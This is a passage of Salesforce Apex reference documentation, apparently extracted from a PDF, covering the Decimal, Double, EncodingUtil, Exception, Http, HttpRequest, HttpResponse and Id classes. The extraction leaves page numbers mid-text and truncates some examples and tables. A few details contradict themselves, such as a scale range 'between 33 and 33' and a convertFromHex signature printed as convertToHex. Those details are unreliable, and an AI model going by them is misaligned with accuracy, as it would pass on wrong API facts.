that is, it rounds towards the nearest neighbor unless both neighbors are equidistant, in which case, this mode rounds towards
the even neighbor.
round(System.RoundingMode)
Returns the rounded approximation of this Decimal. The number is rounded to zero decimal places using the rounding mode
specified by the rounding mode.
scale()
Returns the scale of the Decimal, that is, the number of decimal places.
setScale(Integer)
Sets the scale of the Decimal to the given number of decimal places, using half-even rounding, if necessary. Half-even rounding
mode rounds towards the nearest neighbor unless both neighbors are equidistant, in which case, this mode rounds towards the
even neighbor.
setScale(Integer, System.RoundingMode)
Sets the scale of the Decimal to the given number of decimal places, using the rounding mode specified by the rounding mode, if
necessary.
stripTrailingZeros()
Returns the Decimal with any trailing zeros removed.
toPlainString()
Returns the String value of this Decimal, without using scientific notation.
1452
Reference
Decimal Class
valueOf(Double)
Returns a Decimal that contains the value of the specified Double.
valueOf(Long)
Returns a Decimal that contains the value of the specified Long.
valueOf(String)
Returns a Decimal that contains the value of the specified String. As in Java, the string is interpreted as representing a signed Decimal.
abs()
Returns the absolute value of the Decimal.
Signature
public Decimal abs()
Return Value
Type: Decimal
Example
Decimal myDecimal = -6.02214129;
System.assertEquals(6.02214129, myDecimal.abs());
divide(Decimal, Integer)
Divides this Decimal by the specified divisor, and sets the scale, that is, the number of decimal places, of the result using the specified
scale.
Signature
public Decimal divide(Decimal divisor, Integer scale)
Parameters
divisor
Type: Decimal
scale
Type: Integer
Return Value
Type: Decimal
Example
Decimal decimalNumber = 19;
Decimal result = decimalNumber.divide(100, 3);
System.assertEquals(0.190, result);
1453
Reference
Decimal Class
Signature
public Decimal divide(Decimal divisor, Integer scale, Object roundingMode)
Parameters
divisor
Type: Decimal
scale
Type: Integer
roundingMode
Type: System.RoundingMode
Return Value
Type: Decimal
Example
Decimal myDecimal = 12.4567;
Decimal divDec = myDecimal.divide(7, 2, System.RoundingMode.UP);
System.assertEquals(divDec, 1.78);
doubleValue()
Returns the Double value of this Decimal.
Signature
public Double doubleValue()
Return Value
Type: Double
Example
Decimal myDecimal = 6.62606957;
Double value = myDecimal.doubleValue();
System.assertEquals(6.62606957, value);
format()
Returns the String value of this Decimal using the locale of the context user.
1454
Reference
Decimal Class
Signature
public String format()
Return Value
Type: String
Usage
Scientific notation will be used if an exponent is needed.
Example
// U.S. locale
Decimal myDecimal = 12345.6789;
system.assertEquals('12,345.679', myDecimal.format());
intValue()
Returns the Integer value of this Decimal.
Signature
public Integer intValue()
Return Value
Type: Integer
Example
Decimal myDecimal = 1.602176565;
system.assertEquals(1, myDecimal.intValue());
longValue()
Returns the Long value of this Decimal.
Signature
public Long longValue()
Return Value
Type: Long
Example
Decimal myDecimal = 376.730313461;
system.assertEquals(376, myDecimal.longValue());
1455
Reference
Decimal Class
pow(Integer)
Returns the value of this decimal raised to the power of the specified exponent.
Signature
public Decimal pow(Integer exponent)
Parameters
exponent
Type: Integer
The value of exponent must be between 0 and 32,767.
Return Value
Type: Decimal
Usage
If you use MyDecimal.pow(0), 1 is returned.
The Math.pow method does accept negative values.
Example
Decimal myDecimal = 4.12;
Decimal powDec = myDecimal.pow(2);
System.assertEquals(powDec, 16.9744);
precision()
Returns the total number of digits for the Decimal.
Signature
public Integer precision()
Return Value
Type: Integer
Example
For example, if the Decimal value was 123.45, precision returns 5. If the Decimal value is 123.123, precision returns 6.
Decimal D1 = 123.45;
Integer precision1 = D1.precision();
system.assertEquals(precision1, 5);
Decimal D2 = 123.123;
Integer precision2 = D2.precision();
system.assertEquals(precision2, 6);
1456
Reference
Decimal Class
round()
Returns the rounded approximation of this Decimal. The number is rounded to zero decimal places using half-even rounding mode,
that is, it rounds towards the nearest neighbor unless both neighbors are equidistant, in which case, this mode rounds towards the
even neighbor.
Signature
public Long round()
Return Value
Type: Long
Usage
Note that this rounding mode statistically minimizes cumulative error when applied repeatedly over a sequence of calculations.
Example
Decimal D = 4.5;
Long L = D.round();
System.assertEquals(4, L);
Decimal D1 = 5.5;
Long L1 = D1.round();
System.assertEquals(6, L1);
Decimal D2 = 5.2;
Long L2 = D2.round();
System.assertEquals(5, L2);
Decimal D3 = -5.7;
Long L3 = D3.round();
System.assertEquals(-6, L3);
round(System.RoundingMode)
Returns the rounded approximation of this Decimal. The number is rounded to zero decimal places using the rounding mode specified
by the rounding mode.
Signature
public Long round(System.RoundingMode roundingMode)
Parameters
roundingMode
Type: System.RoundingMode
1457
Reference
Decimal Class
Return Value
Type: Long
scale()
Returns the scale of the Decimal, that is, the number of decimal places.
Signature
public Integer scale()
Return Value
Type: Integer
Example
Decimal myDecimal = 9.27400968;
system.assertEquals(8, myDecimal.scale());
setScale(Integer)
Sets the scale of the Decimal to the given number of decimal places, using half-even rounding, if necessary. Half-even rounding mode
rounds towards the nearest neighbor unless both neighbors are equidistant, in which case, this mode rounds towards the even neighbor.
Signature
public Decimal setScale(Integer scale)
Parameters
scale
Type: Integer
The value of scale must be between 33 and 33.
Return Value
Type: Decimal
Usage
If you do not explicitly set the scale for a Decimal, the scale is determined by the item from which the Decimal is created:
If the Decimal is created as part of a query, the scale is based on the scale of the field returned from the query.
If the Decimal is created from a String, the scale is the number of characters after the decimal point of the String.
If the Decimal is created from a non-decimal number, the scale is determined by converting the number to a String and then using
the number of characters after the decimal point.
1458
Reference
Decimal Class
Example
Decimal myDecimal = 8.987551787;
Decimal setScaled = myDecimal.setscale(3);
System.assertEquals(8.988, setScaled);
setScale(Integer, System.RoundingMode)
Sets the scale of the Decimal to the given number of decimal places, using the rounding mode specified by the rounding mode, if
necessary.
Signature
public Decimal setScale(Integer scale, System.RoundingMode roundingMode)
Parameters
scale
Type: Integer
The value of scale must be between -32,768 and 32,767.
roundingMode
Type: System.RoundingMode
Return Value
Type: Decimal
Usage
If you do not explicitly set the scale for a Decimal, the scale is determined by the item from which the Decimal is created:
If the Decimal is created as part of a query, the scale is based on the scale of the field returned from the query.
If the Decimal is created from a String, the scale is the number of characters after the decimal point of the String.
If the Decimal is created from a non-decimal number, the scale is determined by converting the number to a String and then using
the number of characters after the decimal point.
stripTrailingZeros()
Returns the Decimal with any trailing zeros removed.
Signature
public Decimal stripTrailingZeros()
Return Value
Type: Decimal
1459
Reference
Decimal Class
Example
Decimal myDecimal = 1.10000;
Decimal stripped = myDecimal.stripTrailingZeros();
System.assertEquals(stripped, 1.1);
toPlainString()
Returns the String value of this Decimal, without using scientific notation.
Signature
public String toPlainString()
Return Value
Type: String
Example
Decimal myDecimal = 12345.6789;
System.assertEquals('12345.6789', myDecimal.toPlainString());
valueOf(Double)
Returns a Decimal that contains the value of the specified Double.
Signature
public static Decimal valueOf(Double convertToDecimal)
Parameters
convertToDecimal
Type: Double
Return Value
Type: Decimal
Example
Double myDouble = 2.718281828459045;
Decimal myDecimal = Decimal.valueOf(myDouble);
System.assertEquals(2.718281828459045, myDecimal);
valueOf(Long)
Returns a Decimal that contains the value of the specified Long.
1460
Reference
Double Class
Signature
public static Decimal valueOf(Long convertToDecimal)
Parameters
convertToDecimal
Type: Long
Return Value
Type: Decimal
Example
Long myLong = 299792458;
Decimal myDecimal = Decimal.valueOf(myLong);
System.assertEquals(299792458, myDecimal);
valueOf(String)
Returns a Decimal that contains the value of the specified String. As in Java, the string is interpreted as representing a signed Decimal.
Signature
public static Decimal valueOf(String convertToDecimal)
Parameters
convertToDecimal
Type: String
Return Value
Type: Decimal
Example
String temp = '12.4567';
Decimal myDecimal = Decimal.valueOf(temp);
Double Class
Contains methods for the Double primitive data type.
Namespace
System
1461
Reference
Double Class
Usage
For more information on Double, see Primitive Data Types on page 26.
Double Methods
The following are methods for Double.
IN THIS SECTION:
format()
Returns the String value for this Double using the locale of the context user
intValue()
Returns the Integer value of this Double by casting it to an Integer.
longValue()
Returns the Long value of this Double.
round()
Returns the closest Long to this Double value.
valueOf(String)
Returns a Double that contains the value of the specified String. As in Java, the String is interpreted as representing a signed decimal.
valueOf(Object)
Converts the specified history tracking field value to a Double value.
format()
Returns the String value for this Double using the locale of the context user
Signature
public String format()
Return Value
Type: String
Example
Double myDouble = 1261992;
system.assertEquals('1,261,992', myDouble.format());
intValue()
Returns the Integer value of this Double by casting it to an Integer.
Signature
public Integer intValue()
1462
Reference
Double Class
Return Value
Type: Integer
Example
Double DD1 = double.valueOf('3.14159');
Integer value = DD1.intValue();
system.assertEquals(value, 3);
longValue()
Returns the Long value of this Double.
Signature
public Long longValue()
Return Value
Type: Long
Example
Double myDouble = 421994;
Long value = myDouble.longValue();
System.assertEquals(421994, value);
round()
Returns the closest Long to this Double value.
Signature
public Long round()
Return Value
Type: Long
Example
Double D1 = 4.5;
Long L1 = D1.round();
System.assertEquals(5, L1);
Double D2= 4.2;
Long L2= D2.round();
System.assertEquals(4, L2);
Double D3= -4.7;
1463
Reference
Double Class
valueOf(String)
Returns a Double that contains the value of the specified String. As in Java, the String is interpreted as representing a signed decimal.
Signature
public static Double valueOf(String toDouble)
Parameters
toDouble
Type: String
Return Value
Type: Double
Example
Double DD1 = double.valueOf('3.14159');
valueOf(Object)
Converts the specified history tracking field value to a Double value.
Signature
public static Double valueOf(Object fieldValue)
Parameters
fieldValue
Type: Object
Return Value
Type: Double
Usage
Use this method with the OldValue or NewValue fields of history sObjects, such as AccountHistory, when the field type
corresponds to a Double type, like a number field.
Example
List<AccountHistory> ahlist =
[SELECT Field,OldValue,NewValue
1464
Reference
EncodingUtil Class
FROM AccountHistory];
for(AccountHistory ah : ahlist) {
System.debug('Field: ' + ah.Field);
if (ah.field == 'NumberOfEmployees') {
Double oldValue =
Double.valueOf(ah.OldValue);
Double newValue =
Double.valueOf(ah.NewValue);
}
EncodingUtil Class
Use the methods in the EncodingUtil class to encode and decode URL strings, and convert strings to hexadecimal format.
Namespace
System
Usage
Note: You cannot use the EncodingUtil methods to move documents with non-ASCII characters to Salesforce. You can, however,
download a document from Salesforce. To do so, query the ID of the document using the API query call, then request it by ID.
EncodingUtil Methods
The following are methods for EncodingUtil. All methods are static.
IN THIS SECTION:
base64Decode(String)
Converts a Base64-encoded String to a Blob representing its normal form.
base64Encode(Blob)
Converts a Blob to an unencoded String representing its normal form.
convertFromHex(String)
Converts the specified hexadecimal (base 16) string to a Blob value and returns this Blob value.
convertToHex(Blob)
Returns a hexadecimal (base 16) representation of the inputString. This method can be used to compute the client response
(for example, HA1 or HA2) for HTTP Digest Authentication (RFC2617).
urlDecode(String, String)
Decodes a string in application/x-www-form-urlencoded format using a specific encoding scheme, for example
UTF-8.
urlEncode(String, String)
Encodes a string into the application/x-www-form-urlencoded format using a specific encoding scheme, for example
UTF-8.
1465
Reference
EncodingUtil Class
base64Decode(String)
Converts a Base64-encoded String to a Blob representing its normal form.
Signature
public static Blob base64Decode(String inputString)
Parameters
inputString
Type: String
Return Value
Type: Blob
base64Encode(Blob)
Converts a Blob to an unencoded String representing its normal form.
Signature
public static String base64Encode(Blob inputBlob)
Parameters
inputBlob
Type: Blob
Return Value
Type: String
convertFromHex(String)
Converts the specified hexadecimal (base 16) string to a Blob value and returns this Blob value.
Signature
public static Blob convertToHex(String inputString)
Parameters
inputString
Type: String
The hexadecimal string to convert. The string can contain only valid hexadecimal characters (0-9, a-f, A-F) and must have an even
number of characters.
1466
Reference
EncodingUtil Class
Return Value
Type: Blob
Usage
Each byte in the Blob is constructed from two hexadecimal characters in the input string.
The convertFromHex method throws the following exceptions.
NullPointerException the inputString is null.
InvalidParameterValueException the inputString contains invalid hexadecimal characters or doesnt contain
an even number of characters.
Example
Blob blobValue = EncodingUtil.convertFromHex('4A4B4C');
System.assertEquals('JKL', blobValue.toString());
convertToHex(Blob)
Returns a hexadecimal (base 16) representation of the inputString. This method can be used to compute the client response (for
example, HA1 or HA2) for HTTP Digest Authentication (RFC2617).
Signature
public static String convertToHex(Blob inputString)
Parameters
inputString
Type: Blob
Return Value
Type: String
urlDecode(String, String)
Decodes a string in application/x-www-form-urlencoded format using a specific encoding scheme, for example UTF-8.
Signature
public static String urlDecode(String inputString, String encodingScheme)
Parameters
inputString
Type: String
encodingScheme
Type: String
1467
Reference
Enum Methods
Return Value
Type: String
Usage
This method uses the supplied encoding scheme to determine which characters are represented by any consecutive sequence of the
from \"%xy\". For more information about the format, see The form-urlencoded Media Type in Hypertext Markup Language - 2.0.
urlEncode(String, String)
Encodes a string into the application/x-www-form-urlencoded format using a specific encoding scheme, for example
UTF-8.
Signature
public static String urlEncode(String inputString, String encodingScheme)
Parameters
inputString
Type: String
encodingScheme
Type: String
Return Value
Type: String
Usage
This method uses the supplied encoding scheme to obtain the bytes for unsafe characters. For more information about the format, see
The form-urlencoded Media Type in Hypertext Markup Language - 2.0.
Example
String encoded = EncodingUtil.urlEncode(url, 'UTF-8');
Enum Methods
An enum is an abstract data type with values that each take on exactly one of a finite set of identifiers that you specify. Apex provides
built-in enums, such as LoggingLevel, and you can define your own enum.
All Apex enums, whether user-defined enums or built-in enums, have the following common method that takes no arguments.
values
This method returns the values of the Enum as a list of the same Enum type.
Each Enum value has the following methods that take no arguments.
name
1468
Reference
ordinal
Returns the position of the item, as an Integer, in the list of Enum values starting with zero.
Enum values cannot have user-defined methods added to them.
For more information about Enum, see Enums on page 34.
Example
Integer i = StatusCode.DELETE_FAILED.ordinal();
String s = StatusCode.DELETE_FAILED.name();
List<StatusCode> values = StatusCode.values();
Description
AsyncException
CalloutException
Any problem with a Web service operation, such as failing to make a callout to an external
system.
DmlException
Any problem with a DML statement, such as an insert statement missing a required field
on a record.
EmailException
Any problem with email, such as failure to deliver. For more information, see Outbound Email.
InvalidParameterValueException An invalid parameter was supplied for a method or any problem with a URL used with Visualforce
pages. For more information on Visualforce, see the Visualforce Developer's Guide.
LimitException
JSONException
Any problem with JSON serialization and deserialization operations. For more information, see
the methods of System.JSON, System.JSONParser, and
System.JSONGenerator.
ListException
Any problem with a list, such as attempting to access an index that is out of bounds.
MathException
NoAccessException
Any problem with unauthorized access, such as trying to access an sObject that the current
user does not have access to. This is generally used with Visualforce pages. For more information
on Visualforce, see the Visualforce Developer's Guide.
1469
Reference
Exception
Description
NoDataFoundException
Any problem with data that does not exist, such as trying to access an sObject that has been
deleted. This is generally used with Visualforce pages. For more information on Visualforce, see
the Visualforce Developer's Guide.
NoSuchElementException
Used specifically by the Iterator next method. This exception is thrown if you try to access
items beyond the end of the list. For example, if iterator.hasNext() == false
and you call iterator.next(), this exception is thrown.
NullPointerException
QueryException
Any problem with SOQL queries, such as assigning a query that returns no records or more
than one record to a singleton sObject variable.
RequiredFeatureMissing
A Chatter feature is required for code that has been deployed to an organization that does not
have Chatter enabled.
SearchException
Any problem with SOSL queries executed with SOAP API search() call, for example, when
the searchString parameter contains less than two characters. For more information,
see the SOAP API Developer's Guide.
SecurityException
Any problem with static methods in the Crypto utility class. For more information, see Crypto
Class.
SerializationException
Any problem with the serialization of data. This is generally used with Visualforce pages. For
more information on Visualforce, see the Visualforce Developer's Guide.
SObjectException
Any problem with sObject records, such as attempting to change a field in an update
statement that can only be changed during insert.
StringException
Any problem with Strings, such as a String that is exceeding your heap size.
TypeException
Any problem with type conversions, such as attempting to convert the String 'a' to an Integer
using the valueOf method.
VisualforceException
Any problem with a Visualforce page. For more information on Visualforce, see the Visualforce
Developer's Guide.
XmlException
Any problem with the XmlStream classes, such as failing to read or write XML.
1470
Reference
}
}
Arguments
Return Type
Description
getCause
Exception
getLineNumber
Integer
getMessage
String
getStackTraceString
String
getTypeName
String
initCause
Exception cause
Void
Sets the cause for this exception, if one has not already been
set.
setMessage
String s
Void
Arguments
getDmlFieldNames Integer i
Return Type
Description
String []
Returns the names of the field or fields that caused the error
described by the ith failed row.
getDmlFields
Integer i
Schema.sObjectField [] Returns the field token or tokens for the field or fields that
caused the error described by the ith failed row. For more
information on field tokens, see Dynamic Apex.
getDmlId
Integer i
String
getDmlIndex
Integer i
Integer
getDmlMessage
Integer i
String
1471
Reference
Http Class
Name
Arguments
getDmlStatusCode Integer i
getDmlType
Integer i
Return Type
Description
String
System.StatusCode
Integer
Http Class
Use the Http class to initiate an HTTP request and response.
Namespace
System
Http Methods
The following are methods for Http. All are instance methods.
IN THIS SECTION:
send(HttpRequest)
Sends an HttpRequest and returns the response.
toString()
Returns a string that displays and identifies the object's properties.
send(HttpRequest)
Sends an HttpRequest and returns the response.
Signature
public HttpResponse send(HttpRequest request)
1472
Reference
HttpCalloutMock Interface
Parameters
request
Type: System.HttpRequest
Return Value
Type: System.HttpResponse
toString()
Returns a string that displays and identifies the object's properties.
Signature
public String toString()
Return Value
Type: String
HttpCalloutMock Interface
Enables sending fake responses when testing HTTP callouts.
Namespace
System
Usage
For an implementation example, see Testing HTTP Callouts by Implementing the HttpCalloutMock Interface.
HttpCalloutMock Methods
The following are methods for HttpCalloutMock.
IN THIS SECTION:
respond(HttpRequest)
Returns an HTTP response for the given request. The implementation of this method is called by the Apex runtime to send a fake
response when an HTTP callout is made after Test.setMock has been called.
respond(HttpRequest)
Returns an HTTP response for the given request. The implementation of this method is called by the Apex runtime to send a fake response
when an HTTP callout is made after Test.setMock has been called.
1473
Reference
HttpRequest Class
Signature
public HttpResponse respond(HttpRequest req)
Parameters
req
Type: System.HttpRequest
Return Value
Type: System.HttpResponse
HttpRequest Class
Use the HttpRequest class to programmatically create HTTP requests like GET, POST, PUT, and DELETE.
Namespace
System
Usage
Use the XML classes or JSON classes to parse XML or JSON content in the body of a request created by HttpRequest.
Example
The following example illustrates how you can use an authorization header with a request, and handle the response:
public class AuthCallout {
public void basicAuthCallout(){
HttpRequest req = new HttpRequest();
req.setEndpoint('http://www.yahoo.com');
req.setMethod('GET');
// Specify the required user name and password to access the endpoint
// As well as the header and header information
String username = 'myname';
String password = 'mypwd';
Blob headerValue = Blob.valueOf(username + ':' + password);
String authorizationHeader = 'BASIC ' +
EncodingUtil.base64Encode(headerValue);
req.setHeader('Authorization', authorizationHeader);
// Create a new http object to send the request object
// A response object is generated as a result of the request
Http http = new Http();
HTTPResponse res = http.send(req);
1474
Reference
HttpRequest Class
System.debug(res.getBody());
}
}
Compression
If you need to compress the data you send, use setCompressed, as the following sample illustrates:
HttpRequest req = new HttpRequest();
req.setEndPoint('my_endpoint');
req.setCompressed(true);
req.setBody('some post body');
If a response comes back in compressed format, getBody automatically recognizes the format, uncompresses it, and returns the
uncompressed value.
IN THIS SECTION:
HttpRequest Constructors
HttpRequest Methods
SEE ALSO:
JSON Support
XML Support
HttpRequest Constructors
The following are constructors for HttpRequest.
IN THIS SECTION:
HttpRequest()
Creates a new instance of the HttpRequest class.
HttpRequest()
Creates a new instance of the HttpRequest class.
Signature
public HttpRequest()
HttpRequest Methods
The following are methods for HttpRequest. All are instance methods.
1475
Reference
HttpRequest Class
IN THIS SECTION:
getBody()
Retrieves the body of this request.
getBodyAsBlob()
Retrieves the body of this request as a Blob.
getBodyDocument()
Retrieves the body of this request as a DOM document.
getCompressed()
If true, the request body is compressed, false otherwise.
getEndpoint()
Retrieves the URL for the endpoint of the external server for this request.
getHeader(String)
Retrieves the contents of the request header.
getMethod()
Returns the type of method used by HttpRequest.
setBody(String)
Sets the contents of the body for this request.
setBodyAsBlob(Blob)
Sets the contents of the body for this request using a Blob.
setBodyDocument(Dom.Document)
Sets the contents of the body for this request. The contents represent a DOM document.
setClientCertificate(String, String)
This method is deprecated. Use setClientCertificateName instead.
setClientCertificateName(String)
If the external service requires a client certificate for authentication, set the certificate name.
setCompressed(Boolean)
If true, the data in the body is delivered to the endpoint in the gzip compressed format. If false, no compression format is used.
setEndpoint(String)
Sets the URL for the endpoint of the external server for this request.
setHeader(String, String)
Sets the contents of the request header.
setMethod(String)
Sets the type of method to be used for the HTTP request.
setTimeout(Integer)
Sets the timeout in milliseconds for the request.
toString()
Returns a string containing the URL for the endpoint of the external server for this request and the method used, for example,
Endpoint=http://YourServer, Method=POST
1476
Reference
HttpRequest Class
getBody()
Retrieves the body of this request.
Signature
public String getBody()
Return Value
Type: String
getBodyAsBlob()
Retrieves the body of this request as a Blob.
Signature
public Blob getBodyAsBlob()
Return Value
Type: Blob
getBodyDocument()
Retrieves the body of this request as a DOM document.
Signature
public Dom.Document getBodyDocument()
Return Value
Type: Dom.Document
Example
Use this method as a shortcut for:
String xml = httpRequest.getBody();
Dom.Document domDoc = new Dom.Document(xml);
getCompressed()
If true, the request body is compressed, false otherwise.
Signature
public Boolean getCompressed()
1477
Reference
HttpRequest Class
Return Value
Type: Boolean
getEndpoint()
Retrieves the URL for the endpoint of the external server for this request.
Signature
public String getEndpoint()
Return Value
Type: String
getHeader(String)
Retrieves the contents of the request header.
Signature
public String getHeader(String key)
Parameters
key
Type: String
Return Value
Type: String
getMethod()
Returns the type of method used by HttpRequest.
Signature
public String getMethod()
Return Value
Type: String
Usage
Examples of return values:
DELETE
GET
HEAD
1478
Reference
HttpRequest Class
POST
PUT
TRACE
setBody(String)
Sets the contents of the body for this request.
Signature
public Void setBody(String body)
Parameters
body
Type: String
Return Value
Type: Void
Usage
Limit: 3 MB.
The HTTP request and response sizes count towards the total heap size.
setBodyAsBlob(Blob)
Sets the contents of the body for this request using a Blob.
Signature
public Void setBodyAsBlob(Blob body)
Parameters
body
Type: Blob
Return Value
Type: Void
Usage
Limit: 3 MB.
The HTTP request and response sizes count towards the total heap size.
1479
Reference
HttpRequest Class
setBodyDocument(Dom.Document)
Sets the contents of the body for this request. The contents represent a DOM document.
Signature
public Void setBodyDocument(Dom.Document document)
Parameters
document
Type: Dom.Document
Return Value
Type: Void
Usage
Limit: 3 MB.
setClientCertificate(String, String)
This method is deprecated. Use setClientCertificateName instead.
Signature
public Void setClientCertificate(String clientCert, String password)
Parameters
clientCert
Type: String
password
Type: String
Return Value
Type: Void
Usage
If the server requires a client certificate for authentication, set the client certificate PKCS12 key store and password.
setClientCertificateName(String)
If the external service requires a client certificate for authentication, set the certificate name.
Signature
public Void setClientCertificateName(String certDevName)
1480
Reference
HttpRequest Class
Parameters
certDevName
Type: String
Return Value
Type: Void
Usage
See Using Certificates with HTTP Requests.
setCompressed(Boolean)
If true, the data in the body is delivered to the endpoint in the gzip compressed format. If false, no compression format is used.
Signature
public Void setCompressed(Boolean flag)
Parameters
flag
Type: Boolean
Return Value
Type: Void
setEndpoint(String)
Sets the URL for the endpoint of the external server for this request.
Signature
public Void setEndpoint(String endpoint)
Parameters
endpoint
Type: String
Return Value
Type: Void
setHeader(String, String)
Sets the contents of the request header.
1481
Reference
HttpRequest Class
Signature
public Void setHeader(String key, String Value)
Parameters
key
Type: String
Value
Type: String
Return Value
Type: Void
Usage
Limit 100 KB.
setMethod(String)
Sets the type of method to be used for the HTTP request.
Signature
public Void setMethod(String method)
Parameters
method
Type: String
Possible values for the method type include:
DELETE
GET
HEAD
POST
PUT
TRACE
Return Value
Type: Void
Usage
You can also use this method to set any required options.
1482
Reference
HttpResponse Class
setTimeout(Integer)
Sets the timeout in milliseconds for the request.
Signature
public Void setTimeout(Integer timeout)
Parameters
timeout
Type: Integer
Return Value
Type: Void
Usage
The timeout can be any value between 1 and 120,000 milliseconds.
toString()
Returns a string containing the URL for the endpoint of the external server for this request and the method used, for example,
Endpoint=http://YourServer, Method=POST
Signature
public String toString()
Return Value
Type: String
HttpResponse Class
Use the HttpResponse class to handle the HTTP response returned by the Http class.
Namespace
System
Usage
Use the XML classes or JSON Classes to parse XML or JSON content in the body of a response accessed by HttpResponse.
1483
Reference
HttpResponse Class
Example
In the following getXmlStreamReader example, content is retrieved from an external Web server, then the XML is parsed using
the XmlStreamReader class.
public class ReaderFromCalloutSample {
public void getAndParse() {
// Get the XML document from the external server
Http http = new Http();
HttpRequest req = new HttpRequest();
req.setEndpoint('http://www.cheenath.com/tutorial/sample1/build.xml');
req.setMethod('GET');
HttpResponse res = http.send(req);
// Log the XML content
System.debug(res.getBody());
// Generate the HTTP response as an XML stream
XmlStreamReader reader = res.getXmlStreamReader();
// Read through the XML
while(reader.hasNext()) {
System.debug('Event Type:' + reader.getEventType());
if (reader.getEventType() == XmlTag.START_ELEMENT) {
System.debug(reader.getLocalName());
}
reader.next();
}
}
}
SEE ALSO:
JSON Support
XML Support
HttpResponse Methods
The following are methods for HttpResponse. All are instance methods.
IN THIS SECTION:
getBody()
Retrieves the body returned in the response.
getBodyAsBlob()
Retrieves the body returned in the response as a Blob.
getBodyDocument()
Retrieves the body returned in the response as a DOM document.
1484
Reference
HttpResponse Class
getHeader(String)
Retrieves the contents of the response header.
getHeaderKeys()
Retrieves an array of header keys returned in the response.
getStatus()
Retrieves the status message returned for the response.
getStatusCode()
Retrieves the value of the status code returned in the response.
getXmlStreamReader()
Returns an XmlStreamReader that parses the body of the callout response.
setBody(String)
Specifies the body returned in the response.
setBodyAsBlob(Blob)
Specifies the body returned in the response using a Blob.
setHeader(String, String)
Specifies the contents of the response header.
setStatus(String)
Specifies the status message returned in the response.
setStatusCode(Integer)
Specifies the value of the status code returned in the response.
toString()
Returns the status message and status code returned in the response, for example:
getBody()
Retrieves the body returned in the response.
Signature
public String getBody()
Return Value
Type: String
Usage
Limit 3 MB. The HTTP request and response sizes count towards the total heap size.
getBodyAsBlob()
Retrieves the body returned in the response as a Blob.
1485
Reference
HttpResponse Class
Signature
public Blob getBodyAsBlob()
Return Value
Type: Blob
Usage
Limit 3 MB. The HTTP request and response sizes count towards the total heap size.
getBodyDocument()
Retrieves the body returned in the response as a DOM document.
Signature
public Dom.Document getBodyDocument()
Return Value
Type: Dom.Document
Example
Use it as a shortcut for:
String xml = httpResponse.getBody();
Dom.Document domDoc = new Dom.Document(xml);
getHeader(String)
Retrieves the contents of the response header.
Signature
public String getHeader(String key)
Parameters
key
Type: String
Return Value
Type: String
getHeaderKeys()
Retrieves an array of header keys returned in the response.
1486
Reference
HttpResponse Class
Signature
public String[] getHeaderKeys()
Return Value
Type: String[]
getStatus()
Retrieves the status message returned for the response.
Signature
public String getStatus()
Return Value
Type: String
getStatusCode()
Retrieves the value of the status code returned in the response.
Signature
public Integer getStatusCode()
Return Value
Type: Integer
getXmlStreamReader()
Returns an XmlStreamReader that parses the body of the callout response.
Signature
public XmlStreamReader getXmlStreamReader()
Return Value
Type: System.XmlStreamReader
Usage
Use it as a shortcut for:
String xml = httpResponse.getBody();
XmlStreamReader xsr = new XmlStreamReader(xml);
1487
Reference
HttpResponse Class
setBody(String)
Specifies the body returned in the response.
Signature
public Void setBody(String body)
Parameters
body
Type: String
Return Value
Type: Void
setBodyAsBlob(Blob)
Specifies the body returned in the response using a Blob.
Signature
public Void setBodyAsBlob(Blob body)
Parameters
body
Type: Blob
Return Value
Type: Void
setHeader(String, String)
Specifies the contents of the response header.
Signature
public Void setHeader(String key, String value)
Parameters
key
Type: String
value
Type: String
1488
Reference
HttpResponse Class
Return Value
Type: Void
setStatus(String)
Specifies the status message returned in the response.
Signature
public Void setStatus(String status)
Parameters
status
Type: String
Return Value
Type: Void
setStatusCode(Integer)
Specifies the value of the status code returned in the response.
Signature
public Void setStatusCode(Integer statusCode)
Parameters
statusCode
Type: Integer
Return Value
Type: Void
toString()
Returns the status message and status code returned in the response, for example:
Signature
public String toString()
Return Value
Type: String
1489
Reference
Id Class
Example
Status=OK, StatusCode=200
Id Class
Contains methods for the ID primitive data type.
Namespace
System
1490
Reference
Id Class
if (sr.isSuccess()) {
System.debug('Updated owner ID successfully for ' +
dr.getName() + ' ID ' + sr.getId());
}
else {
System.debug('Updating ' + dr.getName() + ' returned the following errors.');
for(Database.Error e : sr.getErrors()) {
System.debug(e.getMessage());
}
}
}
}
}
Id Methods
The following are methods for Id.
IN THIS SECTION:
addError(String)
Marks a record with a custom error message and prevents any DML operation from occurring.
addError(String, Boolean)
Marks a record with a custom error message, specifies whether or not the error message should be escaped, and prevents any DML
operation from occurring.
addError(Exception)
Marks a record with a custom error message and prevents any DML operation from occurring.
addError(Exception, Boolean)
Marks a record with a custom error message and prevents any DML operation from occurring.
getSObjectType()
Returns the token for the sObject corresponding to this ID. This method is primarily used with describe information.
valueOf(String)
Converts the specified String into an ID and returns the ID.
addError(String)
Marks a record with a custom error message and prevents any DML operation from occurring.
Signature
public Void addError(String errorMsg)
Parameters
errorMsg
Type: String
The error message to mark the record with.
1491
Reference
Id Class
Return Value
Type: Void
Usage
This method is similar to the addError(String) sObject method.
Note: This method escapes any HTML markup in the specified error message. The escaped characters are: \n, <, >, &, ", \,
\u2028, \u2029, and \u00a9. This results in the HTML markup not being rendered; instead it is displayed as text in the
Salesforce user interface.
Example
Trigger.new[0].Id.addError('bad');
addError(String, Boolean)
Marks a record with a custom error message, specifies whether or not the error message should be escaped, and prevents any DML
operation from occurring.
Signature
public Void addError(String errorMsg, Boolean escape)
Parameters
errorMsg
Type: String
The error message to mark the record with.
escape
Type: Boolean
Indicates whether any HTML markup in the custom error message should be escaped (true) or not (false).
Return Value
Type: Void
Usage
The escaped characters are: \n, <, >, &, ", \, \u2028, \u2029, and \u00a9. This results in the HTML markup not being rendered;
instead it is displayed as text in the Salesforce user interface.
Warning: Be cautious if you specify false for the escape argument. Unescaped strings displayed in the Salesforce user
interface can represent a vulnerability in the system because these strings might contain harmful code. If you want to include
HTML markup in the error message, call this method with a false escape argument and make sure you escape any dynamic
content, such as input field values. Otherwise, specify true for the escape argument or call addError(String
errorMsg) instead.
1492
Reference
Id Class
Example
Trigger.new[0].Id.addError('Fix & resubmit', false);
addError(Exception)
Marks a record with a custom error message and prevents any DML operation from occurring.
Signature
public Void addError(Exception exceptionError)
Parameters
exceptionError
Type: System.Exception
An Exception object or a custom exception object that contains the error message to mark the record with.
Return Value
Type: Void
Usage
This method is similar to the addError(Exception) sObject method.
Note: This method escapes any HTML markup in the specified error message. The escaped characters are: \n, <, >, &, ", \,
